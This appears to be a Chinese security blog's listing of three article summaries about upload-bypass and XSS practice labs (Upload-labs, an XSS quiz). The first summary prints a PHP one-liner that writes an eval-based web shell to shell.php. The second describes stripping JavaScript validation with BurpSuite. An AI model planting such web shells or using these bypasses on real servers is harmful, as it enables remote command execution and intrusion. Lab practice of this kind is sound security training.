摘要:
快速查找我 <?php fputs(fopen('shell.php','w'),'<?php @eval($_POST["cmd"])>');?> 阅读全文
摘要:
Upload-labs靶场 Pass-01:一、绕过JS验证1、BurpSuite剔除响应JS 对于JS前端验证,直接删除掉JS代码之后就可以绕过JS验证。 BurpSuite中Proxy-->Options-->Remove all JavaScript2、浏览器审计工具剔除JS 利用浏览器的审查 阅读全文
摘要:
靶机地址:https://xss-quiz.int21h.jp/ XSS漏洞发现:设置独一无二字符串提交,在响应中查找。 定义和用法onmouseover 属性在鼠标指针移动到元素上时触发。注释:onmouseover 属性不适用以下元素:<base>、<bdo>、<br>、<head>、<html 阅读全文